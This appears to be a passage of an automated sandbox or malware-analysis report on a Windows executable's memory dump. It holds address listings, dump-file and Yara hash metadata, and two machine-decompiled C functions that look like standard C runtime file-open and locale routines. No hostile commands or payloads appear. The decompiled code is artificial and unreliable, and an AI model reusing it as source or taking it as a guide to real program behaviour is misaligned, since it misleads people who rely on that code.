                                                                                                0x00447aee
                                                                                                0x00447b07
                                                                                                0x00447b0a
                                                                                                0x00447a47
                                                                                                0x00447a48
                                                                                                0x00000000
                                                                                                0x00447a4d
                                                                                                0x00447b10
                                                                                                0x00000000
                                                                                                0x00447b10
                                                                                                0x00447af5
                                                                                                0x00447b00
                                                                                                0x00000000
                                                                                                0x00447b00
                                                                                                0x00447a89
                                                                                                0x00447a8c
                                                                                                0x00447a8f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447a91
                                                                                                0x00447a91
                                                                                                0x00447a94
                                                                                                0x00447a97
                                                                                                0x00447a9a
                                                                                                0x00447aa1
                                                                                                0x00447aa6
                                                                                                0x00447aa8
                                                                                                0x00447aac
                                                                                                0x00447ac7
                                                                                                0x00447acb
                                                                                                0x00447acc
                                                                                                0x00447acf
                                                                                                0x00447ad0
                                                                                                0x00447adc
                                                                                                0x00447ad2
                                                                                                0x00447ad2
                                                                                                0x00447ad2
                                                                                                0x00447aae
                                                                                                0x00447aae
                                                                                                0x00447aae
                                                                                                0x00447ab9
                                                                                                0x00447abe
                                                                                                0x00447ac1
                                                                                                0x00447ac1
                                                                                                0x00000000
                                                                                                0x00447aa6
                                                                                                0x004479fd
                                                                                                0x00447a00
                                                                                                0x00447a07
                                                                                                0x00447a0c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447a15
                                                                                                0x00447a1b
                                                                                                0x00447a1d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447a1f
                                                                                                0x00447a23
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447a37
                                                                                                0x00447a3d
                                                                                                0x00447a3f
                                                                                                0x00447a63
                                                                                                0x00447a66
                                                                                                0x00000000
                                                                                                0x00447a66
                                                                                                0x00447a41
                                                                                                0x00000000
                                                                                                0x004478bd
                                                                                                0x004478c2
                                                                                                0x004478cd
                                                                                                0x00447a4e
                                                                                                0x00447a4e
                                                                                                0x00447a4e
                                                                                                0x00447a51
                                                                                                0x00447a52
                                                                                                0x00000000
                                                                                                0x00447a5a
                                                                                                0x004478bb
                                                                                                0x00447870
                                                                                                0x00447875
                                                                                                0x0044787c
                                                                                                0x00447882
                                                                                                0x00000000
                                                                                                0x00447882
                                                                                                0x0044784a
                                                                                                0x0044784d
                                                                                                0x00447857
                                                                                                0x00447857
                                                                                                0x0044785a
                                                                                                0x0044785d
                                                                                                0x00000000
                                                                                                0x0044785d
                                                                                                0x00447851
                                                                                                0x00447853
                                                                                                0x00447855
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447855
                                                                                                0x00447801
                                                                                                0x00447806
                                                                                                0x0044780e
                                                                                                0x00000000
                                                                                                0x00447799
                                                                                                0x0044779e
                                                                                                0x004477a1
                                                                                                0x004477a6
                                                                                                0x00447b33
                                                                                                0x00000000
                                                                                                0x00447b33

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9707cf7ddd85aead171221ae991c07f839ef619f6c5e2e690b7711ca268e16d9
                                                                                                • Instruction ID: 08eb86ec9ad85731d69af5e0a0c51ba89f0cefce29c5b426659fc6cf62c0fbd6
                                                                                                • Opcode Fuzzy Hash: 9707cf7ddd85aead171221ae991c07f839ef619f6c5e2e690b7711ca268e16d9
                                                                                                • Instruction Fuzzy Hash: ECC11C70E083499FEF11DFA9C845BBEBBB1BF09314F14405AE450AB392D7789942CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004503E9, Relevance: 13.8, APIs: 9, Instructions: 272COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 41%
                                                                                                			E004503E9(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0045014C(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E004497C5(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E004500B7();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044970E(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46d800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E0044FE6A(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x46d800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E004500B7();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x46d800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E004388FC(GetLastError());
											 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E004498D7( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E004502C8(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044592B(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E004388FC(_t270);
							 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E00438932())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x46d800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E004388FC(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E004500B7();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043891F()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E00438932())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043891F()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E00438932()));
				}
			}





















































                                                                                                0x0045040c
                                                                                                0x00450410
                                                                                                0x00450411
                                                                                                0x00450411
                                                                                                0x00450411
                                                                                                0x00450413
                                                                                                0x00450419
                                                                                                0x00450434
                                                                                                0x00450439
                                                                                                0x0045043c
                                                                                                0x0045043e
                                                                                                0x00450440
                                                                                                0x0045045f
                                                                                                0x00450466
                                                                                                0x0045046d
                                                                                                0x00450470
                                                                                                0x0045047c
                                                                                                0x0045047f
                                                                                                0x00450487
                                                                                                0x00450488
                                                                                                0x0045048b
                                                                                                0x0045048b
                                                                                                0x00450492
                                                                                                0x00450494
                                                                                                0x00450497
                                                                                                0x0045049f
                                                                                                0x004504a2
                                                                                                0x0045050f
                                                                                                0x00450510
                                                                                                0x00450516
                                                                                                0x00450518
                                                                                                0x00450561
                                                                                                0x00450564
                                                                                                0x0045056d
                                                                                                0x00450570
                                                                                                0x00450573
                                                                                                0x00450575
                                                                                                0x00450575
                                                                                                0x00450575
                                                                                                0x00450566
                                                                                                0x00450569
                                                                                                0x00450569
                                                                                                0x0045057a
                                                                                                0x0045057d
                                                                                                0x00450589
                                                                                                0x0045058e
                                                                                                0x0045059a
                                                                                                0x004505a4
                                                                                                0x004505a8
                                                                                                0x004505b2
                                                                                                0x004505b5
                                                                                                0x004505c0
                                                                                                0x004505c5
                                                                                                0x004505d5
                                                                                                0x004505d8
                                                                                                0x004505dc
                                                                                                0x004505dd
                                                                                                0x004505e3
                                                                                                0x004505e8
                                                                                                0x004505eb
                                                                                                0x004505ed
                                                                                                0x004505ef
                                                                                                0x004505f4
                                                                                                0x004505f7
                                                                                                0x004505f9
                                                                                                0x00450623
                                                                                                0x00450647
                                                                                                0x0045064b
                                                                                                0x0045064f
                                                                                                0x00450651
                                                                                                0x00450655
                                                                                                0x00450657
                                                                                                0x00450661
                                                                                                0x00450664
                                                                                                0x0045066b
                                                                                                0x0045066b
                                                                                                0x0045066b
                                                                                                0x0045066b
                                                                                                0x00450655
                                                                                                0x00450670
                                                                                                0x0045067c
                                                                                                0x0045067e
                                                                                                0x00450709
                                                                                                0x00450709
                                                                                                0x00000000
                                                                                                0x00450684
                                                                                                0x00450684
                                                                                                0x00450688
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0045068d
                                                                                                0x0045069f
                                                                                                0x004506a7
                                                                                                0x004506aa
                                                                                                0x004506ab
                                                                                                0x004506ae
                                                                                                0x004506b5
                                                                                                0x004506ba
                                                                                                0x004506bd
                                                                                                0x004506f1
                                                                                                0x004506fb
                                                                                                0x004506fb
                                                                                                0x00450705
                                                                                                0x00000000
                                                                                                0x00450705
                                                                                                0x004506c6
                                                                                                0x004506df
                                                                                                0x004506e6
                                                                                                0x00450509
                                                                                                0x00000000
                                                                                                0x00450509
                                                                                                0x0045067e
                                                                                                0x004505fb
                                                                                                0x00000000
                                                                                                0x004505c7
                                                                                                0x004505ce
                                                                                                0x004505d1
                                                                                                0x004505d3
                                                                                                0x004505fd
                                                                                                0x004505ff
                                                                                                0x00000000
                                                                                                0x00450605
                                                                                                0x00000000
                                                                                                0x004505d3
                                                                                                0x004505c5
                                                                                                0x00450520
                                                                                                0x00450523
                                                                                                0x0045053e
                                                                                                0x00450543
                                                                                                0x00450549
                                                                                                0x0045054b
                                                                                                0x00450556
                                                                                                0x00450556
                                                                                                0x00000000
                                                                                                0x0045054b
                                                                                                0x004504a4
                                                                                                0x004504ab
                                                                                                0x004504ad
                                                                                                0x004504e4
                                                                                                0x004504e4
                                                                                                0x004504ee
                                                                                                0x004504f1
                                                                                                0x004504f8
                                                                                                0x004504f8
                                                                                                0x004504f8
                                                                                                0x00450504
                                                                                                0x00000000
                                                                                                0x00450504
                                                                                                0x004504af
                                                                                                0x004504b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004504b5
                                                                                                0x004504c4
                                                                                                0x004504c9
                                                                                                0x004504cc
                                                                                                0x004504cd
                                                                                                0x004504d0
                                                                                                0x004504d0
                                                                                                0x004504d7
                                                                                                0x004504d9
                                                                                                0x004504dc
                                                                                                0x004504df
                                                                                                0x004504e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00450442
                                                                                                0x00450447
                                                                                                0x0045044a
                                                                                                0x00450451
                                                                                                0x00000000
                                                                                                0x00450451
                                                                                                0x0045041b
                                                                                                0x00450420
                                                                                                0x00450426
                                                                                                0x00450428
                                                                                                0x00000000
                                                                                                0x0045042d

                                                                                                APIs
                                                                                                  • Part of subcall function 004500B7: CreateFileW.KERNEL32(00000000,00000000,?,00450492,?,?,00000000,?,00450492,00000000,0000000C), ref: 004500D4
                                                                                                • GetLastError.KERNEL32 ref: 004504FD
                                                                                                • __dosmaperr.LIBCMT ref: 00450504
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00450510
                                                                                                • GetLastError.KERNEL32 ref: 0045051A
                                                                                                • __dosmaperr.LIBCMT ref: 00450523
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00450543
                                                                                                • CloseHandle.KERNEL32(?), ref: 0045068D
                                                                                                • GetLastError.KERNEL32 ref: 004506BF
                                                                                                • __dosmaperr.LIBCMT ref: 004506C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID:
                                                                                                • API String ID: 4237864984-0
                                                                                                • Opcode ID: bc6ac7719f8584b99d2aab54986c79b3f80391739fd99fa02d0700e1e31c9e02
                                                                                                • Instruction ID: 24b0630b683e3dafc188abe34d5ade8191c39c2f4f45073fca99a1b504bde73c
                                                                                                • Opcode Fuzzy Hash: bc6ac7719f8584b99d2aab54986c79b3f80391739fd99fa02d0700e1e31c9e02
                                                                                                • Instruction Fuzzy Hash: 75A14935A102049FDF18EF68D8517AE7BA0AF46325F14015EFC119F392DB398D16CB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043FCAE, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E0043FCAE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46c00c; // 0x4cc22724
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00442F68(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = E0043F3F8(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E00440C6C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb8bf
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E004428B4(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E00437736();
									asm("int3");
									_t169 =  *0x46d508; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E0043F105(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = E0044A5FC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x458488, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E00434641( &_v528,  *0x46c160, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x4583c8; // 0x40ddd6
									 *0x45449c(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46c298;
										if(_t228 != 0x46c298) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E004414D5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E004414D5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb8bf
												E004414D5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb8bf
										E004414D5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E004414D5(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E00430A5B(_v8 ^ _t262);
				}
				L47:
			}

























































                                                                                                0x0043fcb1
                                                                                                0x0043fcb9
                                                                                                0x0043fcc0
                                                                                                0x0043fcc3
                                                                                                0x0043fcc4
                                                                                                0x0043fcc7
                                                                                                0x0043fccb
                                                                                                0x0043fccc
                                                                                                0x0043fccf
                                                                                                0x0043fcdf
                                                                                                0x0043fceb
                                                                                                0x0043fd02
                                                                                                0x0043fd07
                                                                                                0x0043fd0c
                                                                                                0x0043fd21
                                                                                                0x0043fd24
                                                                                                0x0043fd24
                                                                                                0x0043fd27
                                                                                                0x0043fd2d
                                                                                                0x0043fd36
                                                                                                0x0043fd38
                                                                                                0x0043fd3b
                                                                                                0x0043fd42
                                                                                                0x0043fd45
                                                                                                0x0043fd4b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fd4d
                                                                                                0x0043fd51
                                                                                                0x0043fd7a
                                                                                                0x0043fd7a
                                                                                                0x0043fd53
                                                                                                0x0043fd53
                                                                                                0x0043fd57
                                                                                                0x0043fd5b
                                                                                                0x0043fd62
                                                                                                0x0043fd68
                                                                                                0x00000000
                                                                                                0x0043fd6a
                                                                                                0x0043fd6a
                                                                                                0x0043fd6d
                                                                                                0x0043fd70
                                                                                                0x0043fd78
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fd78
                                                                                                0x0043fd68
                                                                                                0x0043fd87
                                                                                                0x0043fd87
                                                                                                0x0043fd89
                                                                                                0x0043fd8f
                                                                                                0x0043fd95
                                                                                                0x0043fd98
                                                                                                0x0043fd98
                                                                                                0x0043fd9b
                                                                                                0x0043fd9e
                                                                                                0x0043fd9e
                                                                                                0x0043fdae
                                                                                                0x0043fdbc
                                                                                                0x0043fdc1
                                                                                                0x0043fdc8
                                                                                                0x0043fdca
                                                                                                0x00000000
                                                                                                0x0043fdd0
                                                                                                0x0043fdd6
                                                                                                0x0043fddc
                                                                                                0x0043fde3
                                                                                                0x0043fde9
                                                                                                0x0043fdec
                                                                                                0x0043fdf2
                                                                                                0x0043fdff
                                                                                                0x0043fe06
                                                                                                0x0043fe0b
                                                                                                0x0043fe0e
                                                                                                0x0043fe10
                                                                                                0x00440069
                                                                                                0x0044006f
                                                                                                0x00440070
                                                                                                0x00440071
                                                                                                0x00440072
                                                                                                0x00440073
                                                                                                0x00440074
                                                                                                0x00440079
                                                                                                0x0044007a
                                                                                                0x0044007f
                                                                                                0x0043fe16
                                                                                                0x0043fe16
                                                                                                0x0043fe24
                                                                                                0x0043fe27
                                                                                                0x0043fe42
                                                                                                0x0043fe49
                                                                                                0x0043fe4f
                                                                                                0x0043fe55
                                                                                                0x0043fe29
                                                                                                0x0043fe29
                                                                                                0x0043fe31
                                                                                                0x00000000
                                                                                                0x0043fe33
                                                                                                0x0043fe33
                                                                                                0x0043fe39
                                                                                                0x0043fe39
                                                                                                0x0043fe31
                                                                                                0x0043fe5c
                                                                                                0x0043fe5f
                                                                                                0x0043ff7c
                                                                                                0x0043ff7f
                                                                                                0x0043ff8c
                                                                                                0x0043ff8f
                                                                                                0x0043ff97
                                                                                                0x0043ff97
                                                                                                0x0043ff81
                                                                                                0x0043ff87
                                                                                                0x0043ff87
                                                                                                0x0043fe65
                                                                                                0x0043fe65
                                                                                                0x0043fe6b
                                                                                                0x0043fe73
                                                                                                0x0043fe75
